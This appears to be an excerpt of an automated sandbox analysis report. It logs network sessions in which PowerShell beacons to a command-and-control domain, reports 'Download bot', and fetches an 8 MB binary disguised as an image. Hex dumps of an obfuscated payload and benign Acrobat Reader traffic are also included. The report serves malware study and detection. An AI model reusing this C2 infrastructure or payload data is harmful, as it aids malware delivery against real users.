                                                                                                        Data Ascii: UVekLkmu[Dij`FOuWVeiVD0oXWb0dlSISoOhS0[sSGGw`3H{Tl8`VDqBXl4RbFSucImjVD0oTGOBRGqXTYSVLkGvWEKJbWqYUkCKP{GQVWbycFL{Pli[LmWoRVyJelH{TlOWLm[p[GiJbFSHcDS`W{TvVmiKdTmqPYSSLoinX{OO[1msSoWjS3vxXWiJLVLyPomhLmHyVUOS`TmHe3eVLlirX30WeGPxRoG`W15vRTi{[1qFNIW`S3y7X1e5`FW
                                                                                                        2024-11-08 10:10:45 UTC1369INData Raw: 54 65 46 64 56 4f 75 53 6b 57 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 30 4b 75 58 57 65 35 63 47 47 74 63 45 43 60 56 44 30 6f 54 47 4f 42 58 6d 54 7b 63 49 71 6a 53 30 5b 31 55 46 75 72 54 44 79 73 56 6f 43 68 53 30 5b 6a 55 33 71 76 54 30 71 59 53 6c 75 53 57 32 69 7b 54 56 34 72 4c 47 71 58 55 56 38 4a 53 56 79 30 58 31 69 56 4c 47 4b 75 63 49 4f 60 57 6a 4b 6e 5b 44 65 6f 62 44 53 53 63 31 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 64 54 4b 42 58 31 69 42 62 33 57 55 50 6d 6d 54 4c 54 6d 6f 56 6d 62 30 60 6c 4f 74 63 49 65 6a 53 33 79 33 58 6c 6a 34 60 30 71 59 55 6f 6d 6d 56 44 48 76 58 57 62 34 65 54 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 49 56 6f 5b 6b 60 54 47 77 52 6a 65 73 5b 30 43 55 50 59 65 51 64 54 47 73
                                                                                                        Data Ascii: TeFdVOuSkWDTV8oRTOC[1mEPVeKP0KuXWe5cGGtcEC`VD0oTGOBXmT{cIqjS0[1UFurTDysVoChS0[jU3qvT0qYSluSW2i{TV4rLGqXUV8JSVy0X1iVLGKucIO`WjKn[DeobDSSc14E`TGoRTOC[1mEPVeKdTKBX1iBb3WUPmmTLTmoVmb0`lOtcIejS3y3Xlj4`0qYUommVDHvXWb4eTSSc3eKP1GoRTOC[1mIVo[k`TGwRjes[0CUPYeQdTGs
                                                                                                        2024-11-08 10:10:45 UTC1369INData Raw: 65 59 4c 6c 79 30 5b 44 58 76 60 33 4f 75 57 6b 43 6b 63 6c 79 47 56 6d 65 35 60 46 57 57 63 49 57 57 4c 6d 5b 70 58 6b 48 30 60 33 4f 34 50 55 6d 4b 53 47 57 4e 50 33 6d 43 5b 31 6d 45 50 59 43 44 54 56 38 4e 50 33 6d 43 5b 31 6d 45 50 56 75 6b 63 57 58 76 58 33 34 72 53 46 48 7b 57 6f 57 6a 50 31 44 34 52 54 53 43 55 6a 4f 71 50 56 65 4b 50 31 47 73 56 6a 62 34 4c 33 4b 75 64 49 5b 5b 57 30 4b 54 5b 47 65 4e 60 6d 71 59 57 6c 75 60 57 30 47 6f 54 47 4f 43 60 30 71 75 53 6f 4f 6b 4c 6d 57 4e 50 33 6d 43 5b 31 6d 45 50 56 75 6a 53 30 5b 31 58 31 57 60 62 46 4b 49 57 56 65 50 54 31 47 71 54 59 71 76 58 30 58 78 63 49 57 60 53 7b 6a 7b 58 7b 47 35 57 57 71 59 4c 59 65 58 53 30 71 76 58 6a 65 57 60 54 38 32 4c 44 75 44 54 56 38 6f 52 54 4f 43 5b 33 50 78 60
                                                                                                        Data Ascii: eYLly0[DXv`3OuWkCkclyGVme5`FWWcIWWLm[pXkH0`3O4PUmKSGWNP3mC[1mEPYCDTV8NP3mC[1mEPVukcWXvX34rSFH{WoWjP1D4RTSCUjOqPVeKP1GsVjb4L3KudI[[W0KT[GeN`mqYWlu`W0GoTGOC`0quSoOkLmWNP3mC[1mEPVujS0[1X1W`bFKIWVePT1GqTYqvX0XxcIW`S{j{X{G5WWqYLYeXS0qvXjeW`T82LDuDTV8oRTOC[3Px`
                                                                                                        2024-11-08 10:10:45 UTC517INData Raw: 52 4c 47 71 59 4c 59 65 52 63 56 79 7b 56 6d 44 76 52 31 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 70 52 54 57 4e 63 30 71 59 55 6f 4b 4b 53 33 79 75 52 54 69 52 63 30 71 55 50 6c 75 68 4c 33 53 30 58 6a 62 34 60 47 71 45 50 6b 4f 5b 56 44 30 6f 58 7b 4f 56 60 6d 6a 78 57 6f 71 6b 4c 6d 6e 79 58 6a 44 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 69 57 30 6d 6f 52 31 5b 52 63 46 4c 7b 54 59 53 57 53 31 58 76 58 54 4f 43 65 47 57 49 53 6b 43 69 50 31 47 73 5b 44 65 56 65 46 4f 47 56 6f 43 68 53 30 57 6f 55 47 5b 42 60 46 53 49 60 47 57 6d 56 44 4b 72 52 54 57 35 63 47 6d 59 56 59 43 4b 52 49 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 4b 48 54 6d
                                                                                                        Data Ascii: RLGqYLYeRcVy{VmDvR1SSc3eKP1GoRTOC[1mEPVeKP1GpRTWNc0qYUoKKS3yuRTiRc0qUPluhL3S0Xjb4`GqEPkO[VD0oX{OV`mjxWoqkLmnyXjDvR1mEPVeKP1GoRTOC[1mEPVeiW0moR1[RcFL{TYSWS1XvXTOCeGWISkCiP1Gs[DeVeFOGVoChS0WoUG[B`FSI`GWmVDKrRTW5cGmYVYCKRIONP3mC[1mEPVeKP1GoRTOC[1mEPVeKP1KHTm
                                                                                                        2024-11-08 10:10:46 UTC1369INData Raw: 4f 56 69 6a 53 33 79 33 58 6c 6d 43 65 47 65 49 4e 59 6d 55 4c 6d 58 30 52 54 53 47 4f 31 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 30 48 76 57 6d 71 52 53 6d 4b 60 54 6c 75 56 53 6d 5b 34 50 56 6d 52 53 30 58 76 56 6d 65 35 63 44 6d 47 56 6f 43 68 53 30 57 6f 52 6a 69 52 63 46 4b 58 50 6a 65 69 57 32 69 72 52 56 71 7b 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 42 54 30 71 59 4c 59 5b 6a 63 57 57 31 54 30 69 52 63 46 4b 55 50 59 53 57 53 31 58 76 58 54 4f 43 60 33 53 49 57 6f 53 6b 53 57 71 76 58 6a 65 57 5b 31 79 57 56 6f 5b 6b 63 54 34 72 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 6b 6d 4b 53 30 5b 7b 58 7b 4b 57 5b 33 57
                                                                                                        Data Ascii: OVijS3y3XlmCeGeINYmULmX0RTSGO1SSc3eKP1GoRTOC[1mEPVeKP1GoRTOC[0HvWmqRSmK`TluVSm[4PVmRS0XvVme5cDmGVoChS0WoRjiRcFKXPjeiW2irRVq{UjOqPVeKP1GoRTOC[1mEPVeKP1GoRTOBT0qYLY[jcWW1T0iRcFKUPYSWS1XvXTOC`3SIWoSkSWqvXjeW[1yWVo[kcT4rSGGw[1mEPVeKP1GoRTOC[1mEPkmKS0[{X{KW[3W
                                                                                                        2024-11-08 10:10:46 UTC1369INData Raw: 6b 48 30 60 33 4f 34 50 6f 71 60 57 31 34 33 58 6c 30 52 64 6a 79 71 4f 49 57 4b 5b 7b 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 53 6a 35 76 56 57 69 4a 4c 44 79 56 55 6f 4f 60 57 30 5b 32 52 54 4c 79 57 47 71 59 55 6f 5b 68 63 57 4b 37 52 54 4f 52 64 57 71 58 54 6f 6d 6d 57 57 4b 72 58 6a 65 46 4f 57 4f 59 4f 57 53 60 57 31 34 33 58 6c 30 52 64 6a 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 48 34 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 66 76 55 6a 4f 71 50 56 65 4b 50 31 48 34 53 47 47 77 55 6a 4f 71 50 56 65 4b 50 31 4b 76 56 6c 6d 43 63 31 79 59 4f 59 5b 6a 50 31 47 73 56 6a 62 34 4c 33 4b 75 64 49 5b 5b 57 30 4b 54 5b 47 65 4e 60 6d 71 59 57 6c 75 60 57 30 47 76
                                                                                                        Data Ascii: kH0`3O4Poq`W143Xl0RdjyqOIWK[{CMRTOC[1mEPVeKP1GoRTOC[1mEPVeKSj5vVWiJLDyVUoO`W0[2RTLyWGqYUo[hcWK7RTORdWqXTommWWKrXjeFOWOYOWS`W143Xl0RdjSSc3eKP1GoRTOC[1mEPVeKP1H4SGGw[1mEPVeKP1GoRTfvUjOqPVeKP1H4SGGwUjOqPVeKP1KvVlmCc1yYOY[jP1GsVjb4L3KudI[[W0KT[GeN`mqYWlu`W0Gv
                                                                                                        2024-11-08 10:10:46 UTC1369INData Raw: 75 56 53 31 5b 37 58 55 47 42 64 56 47 59 4f 56 71 69 56 44 4b 6e 58 6a 4f 43 65 47 5b 58 55 6c 79 6b 60 33 79 73 52 54 4f 4a 57 47 65 56 55 6d 57 52 57 55 43 71 52 54 4c 79 54 33 53 59 4f 54 30 60 56 47 71 72 58 6a 4f 42 52 56 47 59 5b 46 38 60 56 44 35 76 55 32 62 76 52 31 71 48 54 6f 6d 69 57 33 53 74 56 6d 69 4b 5b 30 43 55 50 6a 38 60 56 46 4f 31 57 55 4b 4e 63 30 71 59 54 6b 47 68 53 30 5b 73 57 6a 65 46 64 6c 44 79 54 6f 6d 69 57 33 53 74 56 6d 69 4b 5b 31 79 57 53 6b 43 54 53 7b 6d 74 57 45 48 31 4f 31 53 53 63 33 75 6b 4c 6d 58 76 5b 44 65 72 65 57 6e 7b 55 56 65 50 54 31 4b 51 56 6d 69 6b 65 47 54 78 55 6c 38 60 57 30 48 79 58 6a 65 56 60 30 5b 49 53 6f 71 69 4c 54 34 72 5b 44 69 52 62 46 4b 75 5b 49 71 57 4c 6d 58 76 52 54 4c 79 50 6c 4b 49 64
                                                                                                        Data Ascii: uVS1[7XUGBdVGYOVqiVDKnXjOCeG[XUlyk`3ysRTOJWGeVUmWRWUCqRTLyT3SYOT0`VGqrXjOBRVGY[F8`VD5vU2bvR1qHTomiW3StVmiK[0CUPj8`VFO1WUKNc0qYTkGhS0[sWjeFdlDyTomiW3StVmiK[1yWSkCTS{mtWEH1O1SSc3ukLmXv[DereWn{UVePT1KQVmikeGTxUl8`W0HyXjeV`0[ISoqiLT4r[DiRbFKu[IqWLmXvRTLyPlKId
                                                                                                        2024-11-08 10:10:46 UTC1369INData Raw: 71 6e 58 6a 69 56 63 44 38 32 4c 44 75 4b 50 31 47 6f 52 54 4f 52 4c 56 4f 75 60 33 65 50 54 31 47 71 58 54 69 52 4c 46 4f 48 55 55 5b 4c 64 55 6a 79 5b 57 69 53 64 46 4b 70 60 46 75 60 57 30 44 30 56 6c 30 4b 64 6a 38 44 50 59 57 5b 4c 6b 6d 31 55 45 4b 53 4c 31 34 54 53 59 6d 4f 64 6a 6a 79 55 55 4b 56 63 44 38 54 60 32 69 4e 57 47 6a 76 55 54 65 57 64 57 71 44 55 6c 30 4e 63 57 54 30 56 6d 53 4b 4f 47 6d 54 60 46 6d 4f 53 47 5b 73 56 6d 53 57 64 6a 34 70 53 55 43 4e 57 30 5b 70 55 59 71 57 4f 54 38 54 5b 46 6d 51 53 47 54 78 55 56 71 53 4c 6a 34 37 50 6c 71 4f 64 6a 6d 35 55 57 53 6e 60 31 30 59 54 6c 30 4e 57 46 69 75 55 57 53 72 60 30 71 75 52 55 4b 5b 64 6c 79 73 55 31 53 53 4f 44 34 54 50 6c 6d 4f 57 44 57 35 56 6d 53 73 65 30 6a 78 57 55 47 4f 50
                                                                                                        Data Ascii: qnXjiVcD82LDuKP1GoRTORLVOu`3ePT1GqXTiRLFOHUU[LdUjy[WiSdFKp`Fu`W0D0Vl0Kdj8DPYW[Lkm1UEKSL14TSYmOdjjyUUKVcD8T`2iNWGjvUTeWdWqDUl0NcWT0VmSKOGmT`FmOSG[sVmSWdj4pSUCNW0[pUYqWOT8T[FmQSGTxUVqSLj47PlqOdjm5UWSn`10YTl0NWFiuUWSr`0quRUK[dlysU1SSOD4TPlmOWDW5VmSse0jxWUGOP
                                                                                                        2024-11-08 10:10:46 UTC1369INData Raw: 71 50 56 65 4b 50 31 48 32 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 5b 45 4f 4a 62 46 53 49 57 59 53 69 53 7b 6d 37 5b 44 4f 43 60 56 4c 78 57 6f 57 60 50 31 4b 7b 58 6b 4b 6b 60 54 38 32 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 46 63 47 57 59 57 6a 34 69 57 55 43 6a 57 47 5b 47 4c 45 65 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 6a 4c 31 71 76 5b 44 65 57 65 46 47 49 4e 59 71 6a 50 31 47 71 56 55 4b 35 63 47 6d 58 52 56 65 68 53 7b 6d 74 52 56 71 7b 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 60 30 6e 78 64 49 5b 5b 63 54 5b 7b 55 33 79 46 52 30 44 79 62 47 5b 55 4c 54 4b 51 57 45 47 47 5b 30 43 55 50 6a 47 4d 50 33 72 32 53 47 47 77 5b 31 6d 45 50 56 65 6c 54 55 43 4d 53 47 47 77 55 6a 4f 71 50 56 65 4b 50 31 47 4e 50 33 35 76 55 6a
                                                                                                        Data Ascii: qPVeKP1H2SGGw[1mEPVeKP1Go[EOJbFSIWYSiS{m7[DOC`VLxWoW`P1K{XkKk`T82LDuKP1GoRTOC[1mFcGWYWj4iWUCjWG[GLEeDTV8oRTOC[1mEPVejL1qv[DeWeFGINYqjP1GqVUK5cGmXRVehS{mtRVq{UjOqPVeKP1GoRTOC`0nxdI[[cT[{U3yFR0DybG[ULTKQWEGG[0CUPjGMP3r2SGGw[1mEPVelTUCMSGGwUjOqPVeKP1GNP35vUj


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        11192.168.11.3049771172.67.137.624438236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-08 10:10:46 UTC290OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118d1df58f19dfb6c9d84850b111e90ce50 HTTP/1.1
                                                                                                        Content-Type: application/json
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                        Host: uyt1n8ded9fb380.com
                                                                                                        Content-Length: 140
                                                                                                        2024-11-08 10:10:46 UTC140OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 72 75 6e 6e 69 6e 67 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 45 6d 70 74 79 20 66 69 6c 65 20 63 72 65 61 74 65 64 20 61 74 3a 20 43 3a 5c 5c 5c 5c 55 73 65 72 73 5c 5c 5c 5c 44 79 6c 61 6e 65 5c 5c 5c 5c 41 70 70 44 61 74 61 5c 5c 5c 5c 4c 6f 63 61 6c 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 65 6d 70 74 79 2e 74 78 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                                        Data Ascii: [ "\"running\"", "\"Empty file created at: C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\empty.txt\"", "----------"]
                                                                                                        2024-11-08 10:10:47 UTC929INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 08 Nov 2024 10:10:47 GMT
                                                                                                        Content-Length: 0
                                                                                                        Connection: close
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CeAhMUgAGrftRS9mFTcls74yE6EQbbstswZyBbClgiZ8hBiYWENC0cI634S4gZXEX2N%2BVt9jb0Dz8CTyXyAI8yWIQX8aFX0OqL0RJk94XvVMle8Y1Orgj5YnPbBnv2HwuA7QdWWiqr5y"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1842&sent=15&recv=14&lost=0&retrans=0&sent_bytes=13720&recv_bytes=3184&delivery_rate=8061349&cwnd=256&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        X-Powered-By: ARR/3.0
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8df4c6734afa1977-EWR
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=102633&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=1090&delivery_rate=37241&cwnd=248&unsent_bytes=0&cid=9e5fbfccb2333b5e&ts=806&x=0"


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        12192.168.11.3049776162.159.61.34438876C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-08 10:10:50 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                        Connection: keep-alive
                                                                                                        Content-Length: 128
                                                                                                        Accept: application/dns-message
                                                                                                        Accept-Language: *
                                                                                                        User-Agent: Chrome
                                                                                                        Accept-Encoding: identity
                                                                                                        Content-Type: application/dns-message
                                                                                                        2024-11-08 10:10:50 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                        Data Ascii: wwwgstaticcom)TP
                                                                                                        2024-11-08 10:10:50 UTC247INHTTP/1.1 200 OK
                                                                                                        Server: cloudflare
                                                                                                        Date: Fri, 08 Nov 2024 10:10:50 GMT
                                                                                                        Content-Type: application/dns-message
                                                                                                        Connection: close
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Content-Length: 468
                                                                                                        CF-RAY: 8df4c68c1f564408-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2024-11-08 10:10:50 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 07 00 04 8e fa 40 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                        Data Ascii: wwwgstaticcom@c)


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        13192.168.11.3049775162.159.61.34438876C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-08 10:10:50 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                        Connection: keep-alive
                                                                                                        Content-Length: 128
                                                                                                        Accept: application/dns-message
                                                                                                        Accept-Language: *
                                                                                                        User-Agent: Chrome
                                                                                                        Accept-Encoding: identity
                                                                                                        Content-Type: application/dns-message
                                                                                                        2024-11-08 10:10:50 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                        Data Ascii: wwwgstaticcom)TP
                                                                                                        2024-11-08 10:10:50 UTC247INHTTP/1.1 200 OK
                                                                                                        Server: cloudflare
                                                                                                        Date: Fri, 08 Nov 2024 10:10:50 GMT
                                                                                                        Content-Type: application/dns-message
                                                                                                        Connection: close
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Content-Length: 468
                                                                                                        CF-RAY: 8df4c68c1bdb4337-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2024-11-08 10:10:50 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 03 00 04 8e fb 28 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                        Data Ascii: wwwgstaticcom()


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        14192.168.11.3049777104.77.220.1724438876C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-08 10:10:57 UTC470OUTGET /onboarding/smskillreader.txt HTTP/1.1
                                                                                                        Host: armmf.adobe.com
                                                                                                        Connection: keep-alive
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.3.20269 Chrome/105.0.0.0 Safari/537.36
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        If-None-Match: "78-5faa31cce96da"
                                                                                                        If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
                                                                                                        2024-11-08 10:10:57 UTC198INHTTP/1.1 304 Not Modified
                                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                                        Last-Modified: Mon, 01 May 2023 15:02:33 GMT
                                                                                                        ETag: "78-5faa31cce96da"
                                                                                                        Date: Fri, 08 Nov 2024 10:10:57 GMT
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        15192.168.11.3049778172.67.137.624438236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-08 10:10:58 UTC289OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118d1df58f19dfb6c9d84850b111e90ce50 HTTP/1.1
                                                                                                        Content-Type: application/json
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                        Host: uyt1n8ded9fb380.com
                                                                                                        Content-Length: 69
                                                                                                        2024-11-08 10:10:58 UTC69OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 53 6c 65 65 70 20 31 30 73 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 44 6f 77 6e 6c 6f 61 64 20 62 6f 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                                        Data Ascii: [ "\"Sleep 10s\"", "\"Download bot\"", "----------"]
                                                                                                        2024-11-08 10:10:59 UTC941INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 08 Nov 2024 10:10:59 GMT
                                                                                                        Content-Length: 0
                                                                                                        Connection: close
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4qvo%2BqIXnUVd5YHg7BpmqJCHQsn9Pra05wikNO2zFVQSTBV%2BA0H1hyKT%2Fg2G1%2FpWSkU6uXNv6LusvoFRdoJM%2F0RmAeP7ivRYD2iAyJ6mivfyl3jj7jVrYnopYQ%2FxTDp2dHzU0UURFoRA"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=26378&sent=56&recv=70&lost=0&retrans=0&sent_bytes=22158&recv_bytes=44150&delivery_rate=8061349&cwnd=256&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        X-Powered-By: ARR/3.0
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8df4c6beda0c4373-EWR
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=114699&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1018&delivery_rate=37457&cwnd=252&unsent_bytes=0&cid=6f58adae8e84f371&ts=815&x=0"


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        16192.168.11.3049779172.67.137.624438236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-08 10:10:59 UTC338OUTGET /file2/30bb492ec87899a2b4a8fa5c9eeec46908bbc655365f1557b986a778660e2192b4caaca811f3fa61268d807a76d0dd5d4112cfa6ad3e7314c91843f2cea3c900100c4cf95939e2af05452bbe95d756961d6e14e2026cebcf6a859fdcef1cd21d HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                        Host: uyt1n8ded9fb380.com
                                                                                                        2024-11-08 10:11:00 UTC1061INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 08 Nov 2024 10:11:00 GMT
                                                                                                        Content-Type: application/octet-stream
                                                                                                        Content-Length: 8351232
                                                                                                        Connection: close
                                                                                                        content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t10HBT1SkwOyfQrM2z3oEhf9hA69Sqf4%2FIJGa6%2FMMWcy93QaIP1XqjXIOjuMkL%2FKZdXAK6T07l6Ff4wB%2BSu%2BStF9p5iI2%2FF5Gmn5cgbP9gNdSTj9yfpM47CrxQsy8f9Fu4yS%2BZdeNrxL"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=28545&sent=58&recv=72&lost=0&retrans=0&sent_bytes=22906&recv_bytes=45093&delivery_rate=8061349&cwnd=256&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        X-Powered-By: ARR/3.0
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8df4c6c5ccf07c94-EWR
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=111287&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=976&delivery_rate=37362&cwnd=251&unsent_bytes=0&cid=d8c8dcd415bfdbf0&ts=846&x=0"
